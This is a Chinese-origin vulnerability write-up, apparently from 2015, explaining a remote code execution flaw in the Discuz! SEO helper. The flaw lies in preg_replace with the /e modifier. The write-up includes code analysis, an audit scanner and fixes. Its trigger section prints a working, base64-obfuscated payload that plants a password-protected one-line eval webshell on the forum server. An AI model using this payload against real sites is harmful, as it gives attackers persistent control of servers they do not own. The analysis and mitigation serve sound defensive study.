Contents
1. Vulnerability Description
2. Trigger Conditions
3. Affected Scope
4. Vulnerable Code Analysis
5. Mitigation
6. Offense and Defense Thoughts
1. Vulnerability Description
Remote code execution in the SEO module caused by preg_replace with the "e" modifier and a double-quoted replacement string.
Relevant Link:
http://www.wooyun.org/bugs/wooyun-2012-06420
2. Trigger Conditions
1. In the admin backend, enable the SEO extension.
2. Register an arbitrary account.
3. Log in as that user and post a blog entry (note: a blog entry, not a forum post).
4. Add an image, choose "network image", and enter the address {${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}
5. Visit the blog entry: demo.php is created in the forum root directory, a one-line webshell with password c.
Relevant Link:
http://weibo.com/2242334800/ygxonqLF9?type=comment#_rnd1432431149028
http://sebug.net/vuldb/ssvid-60082
3. Affected Scope
4. Vulnerable Code Analysis
/source/class/helper/helper_seo.php
..
if($searcharray && $replacearray) {
    $_G['trunsform_tmp'] = array();
    /*
     1. The $content being substituted comes from the user-supplied image address.
     2. The replacement string wraps the back-references in double quotes.
     3. The search regex of preg_replace uses the "e" modifier, so after substitution
        PHP runs the replacement string through eval(); because the eval("${${}}")
        syntax executes dynamically, an attacker can inject code remotely.
    */
    $content = preg_replace("/(<script\s+.*?>.*?<\/script>)|(<a\s+.*?>.*?<\/a>)|(<img\s+.*?[\/]?>)|(\[attach\](\d+)\[\/attach\])/ies", 'helper_seo::base64_transform("encode", "<relatedlink>", "\\1\\2\\3\\4", "</relatedlink>")', $content);
    $content = preg_replace($searcharray, $replacearray, $content, 1);
    $content = preg_replace("/<relatedlink>(.*?)<\/relatedlink>/ies", "helper_seo::base64_transform('decode', '', '\\1', '')", $content);
}
..
Relevant Link:
http://www.wooyun.org/upload/201204/2620001868555ef2f2153e9b615d32467724d943.jpg
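The root cause above is a preg_replace() call whose pattern literal carries the "e" modifier. The following audit helper is an added example, not code from Discuz! or from this post: it scans PHP source text for such calls so that other occurrences can be found before an attacker does. The function name find_eval_modifier_calls() and the sample source are constructed for this illustration; only pattern literals written as single- or double-quoted strings are recognised.

```php
<?php
// Added example (not Discuz! code): flag preg_replace() calls whose pattern
// literal ends with a modifier list containing "e". The function name and the
// constructed sample source below are assumptions made for this illustration.

/**
 * Return one entry per preg_replace() call whose quoted pattern literal uses
 * the "e" modifier. Patterns built from variables are out of scope.
 */
function find_eval_modifier_calls(string $source): array
{
    // Group 1: quote character; group 2: PCRE delimiter; group 3: pattern body
    // (backslash-escaped characters such as \/ are skipped over); group 4: modifiers.
    $scan = '/preg_replace\s*\(\s*([\'"])([^a-zA-Z0-9\\\\\s])((?:\\\\.|(?!\2).)*)\2([a-zA-Z]*)\1/s';
    $hits = [];
    if (preg_match_all($scan, $source, $matches, PREG_SET_ORDER | PREG_OFFSET_CAPTURE)) {
        foreach ($matches as $m) {
            $modifiers = $m[4][0];
            if (strpos($modifiers, 'e') === false) {
                continue;   // no eval of the replacement string: not interesting here
            }
            $hits[] = [
                // 1-based line of the call: count newlines before the match offset
                'line'      => substr_count($source, "\n", 0, $m[0][1]) + 1,
                'modifiers' => $modifiers,
                'pattern'   => $m[2][0] . $m[3][0] . $m[2][0] . $modifiers,
            ];
        }
    }
    return $hits;
}

// Constructed sample: the two /e calls from helper_seo.php, the keyword
// replacement call (pattern held in a variable) and an unrelated safe call.
$sample = <<<'SRC'
$content = preg_replace("/(<img\s+.*?[\/]?>)/ies", 'helper_seo::base64_transform("encode", "<relatedlink>", "\\1", "</relatedlink>")', $content);
$content = preg_replace($searcharray, $replacearray, $content, 1);
$content = preg_replace("/<relatedlink>(.*?)<\/relatedlink>/ies", "helper_seo::base64_transform('decode', '', '\\1', '')", $content);
$clean = preg_replace('#\s+#', ' ', $content);
SRC;

foreach (find_eval_modifier_calls($sample) as $hit) {
    printf("line %d: /%s modifier on %s\n", $hit['line'], $hit['modifiers'], $hit['pattern']);
}
```

On the constructed sample the helper flags the two "/ies" calls and leaves the variable-pattern and "#\s+#" calls alone. It is a triage aid, not a proof of exploitability: a flagged call is only dangerous when user-controlled text reaches a double-quoted part of the replacement string, as in helper_seo.php.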
5. Mitigation
/source/class/helper/helper_seo.php
..
if($searcharray && $replacearray) {
    $_G['trunsform_tmp'] = array();
    /* After the fix the double quotes are changed to single quotes, so the dynamic ${${}} syntax can no longer execute. */
    $content = preg_replace("/(<script\s+.*?>.*?<\/script>)|(<a\s+.*?>.*?<\/a>)|(<img\s+.*?[\/]?>)|(\[attach\](\d+)\[\/attach\])/ies", "helper_seo::base64_transform('encode', '<relatedlink>', '\\1\\2\\3\\4', '</relatedlink>')", $content);
    /* */
    $content = preg_replace($searcharray, $replacearray, $content, 1);
    $content = preg_replace("/<relatedlink>(.*?)<\/relatedlink>/ies", "helper_seo::base64_transform('decode', '', '\\1', '')", $content);
}
..
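The single-quote fix above still relies on the "e" modifier, which PHP deprecated in 5.5 and removed in 7.0. The durable fix is preg_replace_callback(), which hands the match to a closure instead of eval()ing a replacement string, so nothing in the matched text is ever parsed as PHP. The block below is an added example, not Discuz! code: it keeps the same alternation as helper_seo.php (minus "e") and replaces helper_seo::base64_transform() with base64_transform_stub(), a stand-in whose signature is assumed here; the function names relatedlink_encode()/relatedlink_decode() and the example.invalid input are also constructed.

```php
<?php
// Added example (not Discuz! code): the wrap/unwrap step rewritten with
// preg_replace_callback(). helper_seo::base64_transform() is replaced by
// base64_transform_stub(), whose (mode, prefix, body, suffix) signature is assumed.

function base64_transform_stub(string $mode, string $prefix, string $body, string $suffix): string
{
    if ($mode === 'encode') {
        return $prefix . base64_encode($body) . $suffix;
    }
    $decoded = base64_decode($body, true);   // strict mode: reject non-base64 bytes
    return $prefix . ($decoded === false ? '' : $decoded) . $suffix;
}

// Wrap every script/a/img/[attach] fragment so the later SEO keyword replacement
// does not touch it. Same alternation as helper_seo.php, without the /e modifier.
function relatedlink_encode(string $content): string
{
    $pattern = '/(<script\s+.*?>.*?<\/script>)|(<a\s+.*?>.*?<\/a>)|(<img\s+.*?[\/]?>)|(\[attach\](\d+)\[\/attach\])/is';
    return preg_replace_callback($pattern, function (array $m): string {
        // $m[0] is the whole matched fragment (what "\1\2\3\4" concatenated to in
        // the original). It is passed as plain data: a "{${...}}" sequence inside
        // it is just characters and is never interpolated or evaluated.
        return base64_transform_stub('encode', '<relatedlink>', $m[0], '</relatedlink>');
    }, $content);
}

// Reverse step, run after the keyword replacement.
function relatedlink_decode(string $content): string
{
    return preg_replace_callback('/<relatedlink>(.*?)<\/relatedlink>/is', function (array $m): string {
        return base64_transform_stub('decode', '', $m[1], '');
    }, $content);
}

// Constructed input: an image address carrying the interpolation syntax that the
// original double-quoted replacement string would have handed to eval().
$post = 'text <img src="http://example.invalid/{${"not_code"}}.png" /> more text';

$wrapped  = relatedlink_encode($post);
$restored = relatedlink_decode($wrapped);

var_dump(strpos($wrapped, '<relatedlink>') !== false);   // the img fragment was wrapped
var_dump($restored === $post);                           // and it round-trips as inert text
```

The closure receives the match as a string argument and returns a string; there is no second parsing pass, so the quoting of the replacement no longer matters. This also removes the dependency on the "e"-modifier escaping behaviour that the single-quote fix relies on, and keeps the code working on PHP 7 and later.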
6. Offense and Defense Thoughts
Copyright (c) 2015 LittleHann All rights reserved